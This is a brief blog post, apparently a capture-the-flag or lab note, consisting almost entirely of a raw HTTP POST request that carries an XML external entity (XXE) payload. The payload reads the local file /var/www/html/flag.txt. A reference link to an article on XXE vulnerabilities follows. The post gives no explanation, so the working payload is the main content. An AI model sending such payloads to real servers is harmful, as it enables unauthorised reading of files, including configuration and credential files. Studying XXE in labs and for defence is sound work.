XXE

POST / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 145
Connection: close
Cookie: PHPSESSID=aro5qb75jpljgc0kenk2g1ef22

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/html/flag.txt" >]>

<message>&xxe;</message>

参考链接

先知社区-一篇文章带你深入理解漏洞之 XXE 漏洞

posted @ 2020-09-28 17:53  renblog  阅读(171)  评论(0编辑  收藏  举报